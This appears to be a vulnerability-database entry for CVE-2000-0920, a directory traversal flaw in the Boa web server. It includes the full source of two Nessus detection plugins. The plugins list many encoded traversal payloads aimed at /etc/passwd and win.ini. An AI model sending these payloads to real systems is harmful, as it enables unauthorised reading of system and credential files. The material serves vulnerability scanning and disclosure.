Vulnerabilities > CVE-2000-0920 - Unspecified vulnerability in BOA Webserver
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Directory traversal vulnerability in BOA web server 0.94.8.2 and earlier allows remote attackers to read arbitrary files via a modified .. (dot dot) attack in the GET HTTP request that uses a "%2E" instead of a "."
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Exploit-Db
| description | BOA Web Server 0.94.8.2 - Arbitrary File Access. CVE-2000-0920. Webapps exploit for linux platform |
| id | EDB-ID:36689 |
| last seen | 2016-02-04 |
| modified | 2000-12-19 |
| published | 2000-12-19 |
| reporter | llmora |
| source | https://www.exploit-db.com/download/36689/ |
| title | BOA Web Server 0.94.8.2 - Arbitrary File Access |
Nessus
NASL family Web Servers NASL id HTTPD_BOA.NASL description The remote Boa Webserver allows an attacker to read arbitrary files on the remote web server by prefixing the pathname of the file with hex-encoded last seen 2020-06-01 modified 2020-06-02 plugin id 10527 published 2000-10-06 reporter This script is Copyright (C) 2000-2018 Thomas Reinke source https://www.tenable.com/plugins/nessus/10527 title Boa Web Server Traversal Arbtirary File Access/Execution code # # This script was written by Thomas Reinke <[email protected]> # # See the Nessus Scripts License for details # # Changes by Tenable: # - Revised plugin title, output formatting, family change (9/4/09) include("compat.inc"); if(description) { script_id(10527); script_version ("1.26"); script_cve_id("CVE-2000-0920"); script_bugtraq_id(1770); script_name(english:"Boa Web Server Traversal Arbtirary File Access/Execution"); script_set_attribute(attribute:"synopsis", value: "The remote host is affected by an information disclosure vulnerability." ); script_set_attribute(attribute:"description", value: "The remote Boa Webserver allows an attacker to read arbitrary files on the remote web server by prefixing the pathname of the file with hex-encoded '../../' characters." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Oct/97" ); script_set_attribute(attribute:"solution", value: "Upgrade to BowWebserver 0.94.8.3 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2000/10/06"); script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/07"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english:"Boa file retrieval"); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2000-2020 Thomas Reinke"); script_family(english:"Web Servers"); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("http_func.inc"); port = get_http_port(default:80, embedded:TRUE); if(get_port_state(port)) { soc = http_open_socket(port); if(soc) { buf = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"); buf = http_get(item:buf, port:port); send(socket:soc, data:buf); rep = http_recv(socket:soc); if(("root:" >< rep) && ("Boa/" >< rep) ) security_warning(port); http_close_socket(soc); } }NASL family Web Servers NASL id WEB_TRAVERSAL.NASL description It appears possible to read arbitrary files on the remote host outside the web server last seen 2020-06-01 modified 2020-06-02 plugin id 10297 published 1999-11-05 reporter This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/10297 title Web Server Directory Traversal Arbitrary File Access code # # (C) Tenable Network Security, Inc. # ############## # References: ############## # # Date: 25 Sep 2002 09:10:45 -0000 # Message-ID: <[email protected]> # From: "DownBload" <[email protected]> # To: [email protected] # Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server # # From: "David Endler" <[email protected]> # To:[email protected] # Date: Mon, 23 Sep 2002 16:41:19 -0400 # Subject: iDEFENSE Security Advisory 09.23.2002: Directory Traversal in Dino's Webserver # # From:"UkR security team^(TM)" <[email protected]> # Subject: advisory # To: [email protected] # Date: Thu, 05 Sep 2002 16:30:30 +0400 # Message-ID: <[email protected]> # # From: "Tamer Sahin" <[email protected]> # To: [email protected] # Subject: Web Server 4D/eCommerce 3.5.3 Directory Traversal Vulnerability # Date: Tue, 15 Jan 2002 00:36:26 +0200 # Affiliation: http://www.securityoffice.net # # From: "Alex Forkosh" <[email protected]> # To: [email protected] # Subject: Viewing arbitrary file from the file system using Eshare Expressions 4 server # Date: Tue, 5 Feb 2002 00:18:42 -0600 # include("compat.inc"); if (description) { script_id(10297); script_version("1.124"); script_cvs_date("Date: 2018/09/17 21:46:53"); script_cve_id( "CVE-2000-0920", "CVE-2007-6483", "CVE-2008-5315", "CVE-2010-1571", "CVE-2010-3459", "CVE-2010-3460", "CVE-2010-3487", "CVE-2010-3488", "CVE-2010-3743", "CVE-2010-4181", "CVE-2011-1900", "CVE-2011-2524", "CVE-2011-4788", "CVE-2012-0697", "CVE-2012-1464", "CVE-2012-5100", "CVE-2012-5335", "CVE-2012-5344", "CVE-2012-5641", "CVE-2013-2619", "CVE-2013-3304", "CVE-2014-3744" ); script_bugtraq_id( 1770, 7308, 7362, 7378, 7544, 7715, 26583, 32412, 40053, 40133, 40680, 43230, 43258, 43356, 43358, 43830, 44393, 44564, 44586, 45599, 45603, 47760, 47842, 47987, 48114, 48926, 51286, 51311, 51399, 52327, 52384, 52541, 56871, 57143, 57313, 58794, 67389, 70760 ); script_xref(name:"EDB-ID", value:"24915"); script_xref(name:"EDB-ID", value:"33428"); script_xref(name:"EDB-ID", value:"35056"); script_name(english:"Web Server Directory Traversal Arbitrary File Access"); script_summary(english:"Tries to retrieve file outside document directory"); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by a directory traversal vulnerability."); script_set_attribute(attribute:"description", value: "It appears possible to read arbitrary files on the remote host outside the web server's document directory using a specially crafted URL. An unauthenticated attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks. Note that this plugin is not limited to testing for known vulnerabilities in a specific set of web servers. Instead, it attempts a variety of generic directory traversal attacks and considers a product to be vulnerable simply if it finds evidence of the contents of '/etc/passwd' or a Windows 'win.ini' file in the response. It may, in fact, uncover 'new' issues, that have yet to be reported to the product's vendor."); script_set_attribute(attribute:"solution", value: "Contact the vendor for an update, use a different product, or disable the service altogether."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-0697"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_cwe_id(22); script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/05"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 1999-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Web Servers"); script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "httpver.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("data_protection.inc"); port = get_http_port(default:80, embedded:TRUE); i=0; r[i++] = '/' + mult_str(str:'../', nb:12) + 'windows/win.ini'; r[i++] = '/' + mult_str(str:'../', nb:12) + 'winnt/win.ini'; r[i++] = mult_str(str:'../', nb:12) + 'windows/win.ini'; r[i++] = mult_str(str:'../', nb:12) + 'winnt/win.ini'; r[i++] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini'; r[i++] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini'; r[i++] = '/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini'; r[i++] = '/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini'; r[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'; r[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin.ini'; r[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini'; r[i++] = '/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt%5cwin%2eini'; r[i++] = '/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini'; r[i++] = '/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini'; r[i++] = '/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini'; r[i++] = '/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini'; r[i++] = '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'; r[i++] = '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini'; r[i++] = '/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini'; r[i++] = '/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini'; r[i++] = '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini'; r[i++] = '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini'; r[i++] = '/.../.../.../.../.../.../.../.../.../windows/win.ini'; r[i++] = '/.../.../.../.../.../.../.../.../.../winnt/win.ini'; r[i++] = '/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini'; r[i++] = '/...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini'; r[i++] = '/..../..../..../..../..../..../..../..../..../windows/win.ini'; r[i++] = '/..../..../..../..../..../..../..../..../..../winnt/win.ini'; r[i++] = '/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini'; r[i++] = '/....\\....\\....\\....\\....\\....\\....\\....\\....\\winnt\\win.ini'; r[i++] = '/././././././../../../../../windows/win.ini'; r[i++] = '/././././././../../../../../winnt/win.ini'; r[i++] = '.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/windows/win.ini'; r[i++] = '.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini'; r[i++] = '/nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini'; r[i++] = '/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini'; r[i++] = '/%80../%80../%80../%80../%80../%80../windows/win.ini'; r[i++] = '/%80../%80../%80../%80../%80../%80../winnt/win.ini'; r[i++] = '/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/win.ini'; r[i++] = '/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./winnt/win.ini'; r[i++] = '/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/windows/win.ini'; r[i++] = '/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/winnt/win.ini'; r[i++] = mult_str(str:"/%uff0e%uff0e", nb:12) + '/windows/win.ini'; r[i++] = mult_str(str:"/%uff0e%uff0e", nb:12) + '/winnt/win.ini'; # Some web servers badly parse args under the form /path/file?arg=../../ r[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini'; r[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini'; r[i++] = '/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'; r[i++] = '/scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini'; r[i++] = 0; contents = ""; info = ""; for (i=0; r[i]; i++) { url = r[i]; if (check_win_dir_trav(port: port, url:url)) { if (url[0] == '/') info += ' - ' + build_url(port: port, qs:url) + '\n'; else info += ' - ' + url + ' *\n'; if (!contents && report_verbosity > 0) { res = http_send_recv3(port: port, method: 'GET', item:url, exit_on_fail:TRUE); if (! isnull(res)) contents = res[2]; } if (!thorough_tests) break; } } if (info) { if (report_verbosity > 0) { if (max_index(split(info)) > 1) s = "s"; else s = ""; report = '\n' + 'Nessus was able to retrieve the remote host\'s \'win.ini\' file using the\n' + 'following URL' + s + ' :\n' + '\n' + info; if (egrep(pattern:" \*$", string:info)) { report += '\n' + '* Note that this requires sending an HTTP GET request without the\n' + ' leading forward slash to the web server at ' + build_url(port:port, qs:'/') + ',\n' + ' which is not supported by most web browsers.\n'; } if (contents) { contents = data_protection::redact_etc_passwd(output:contents); report += '\n' + 'Here are the contents :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + chomp(contents) + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; } if (!thorough_tests) report += '\n' + 'Note that Nessus stopped searching after one exploit was found. To\n' + 'report all known exploits, enable the \'Perform thorough tests\'\n' + 'setting and re-scan.\n'; security_hole(port:port, extra:report); } else security_hole(port); set_kb_item(name: strcat("www/", port, "/generic_traversal"), value: TRUE); exit(0); } i=0; r[i++] = '/' + mult_str(str:'../', nb:12) + 'etc/passwd'; r[i++] = mult_str(str:'../', nb:12) + 'etc/passwd'; r[i++] = '//' + mult_str(str:'../', nb:12) + 'etc/passwd'; r[i++] = mult_str(str:'/....', nb:12) + '/etc/passwd'; r[i++] = mult_str(str:'/%2e%2e', nb:12) + '/etc/passwd'; r[i++] = '/' + mult_str(str:'..%2f', nb:12) + 'etc/passwd'; r[i++] = mult_str(str:'..%2f', nb:12) + 'etc/passwd'; r[i++] = '/' + mult_str(str:'%2e%2e%2f', nb:12) + 'etc/passwd'; r[i++] = '/././././././../../../../../etc/passwd'; r[i++] = mult_str(str:"/%uff0e%uff0e", nb:12) + '/etc/passwd'; # Some web servers badly parse args under the form /path/file?arg=../../ r[i++] = '/scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd'; r[i++] = '/scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'; if (thorough_tests || report_paranoia >= 2) { # An old bug (06 Jan 2003) in CommunigatePro. Note the *// r[i++] = '/DomainFiles/*//../../../../../../etc/passwd'; } r[i++] = 0; contents = ""; info = ""; for (i = 0; r[i]; i++) { url = r[i]; # nb: at least one web server ('st') fails to respond at all if the URL does # not have a leading slash. if (url[0] = '/') exit_on_fail = TRUE; else exit_on_fail = FALSE; res = http_send_recv3(port: port, method: 'GET', item:url, exit_on_fail:exit_on_fail); if (isnull(res)) continue; if (egrep(pattern: 'root:.*:0:[01]:', string: res[2])) { if (url[0] == '/') info += ' - ' + build_url(port: port, qs:url) + '\n'; else info += ' - ' + url + ' *\n'; if (!contents && report_verbosity > 0) { contents = res[2]; } if (!thorough_tests) break; } } if (info) { if (report_verbosity > 0) { if (max_index(split(info)) > 1) s = "s"; else s = ""; report = '\n' + 'Nessus was able to retrieve the remote host\'s password file using the\n' + 'following URL' + s + ' :\n' + '\n' + info; if (egrep(pattern:" \*$", string:info)) { report += '\n' + '* Note that this requires sending an HTTP GET request without the\n' + ' leading forward slash to the web server at ' + build_url(port:port, qs:'/') + ',\n' + ' which is not supported by most web browsers.\n'; } if (contents) { contents = data_protection::redact_etc_passwd(output:contents); report += '\n' + 'Here are the contents :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + contents + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; } if (!thorough_tests) report += '\n' + 'Note that Nessus stopped searching after one exploit was found. To\n' + 'report all known exploits, enable the \'Perform thorough tests\'\n' + 'setting and re-scan.\n'; security_hole(port:port, extra:report); } else security_hole(port); set_kb_item(name: strcat("www/", port, "/generic_traversal"), value: TRUE); exit(0); }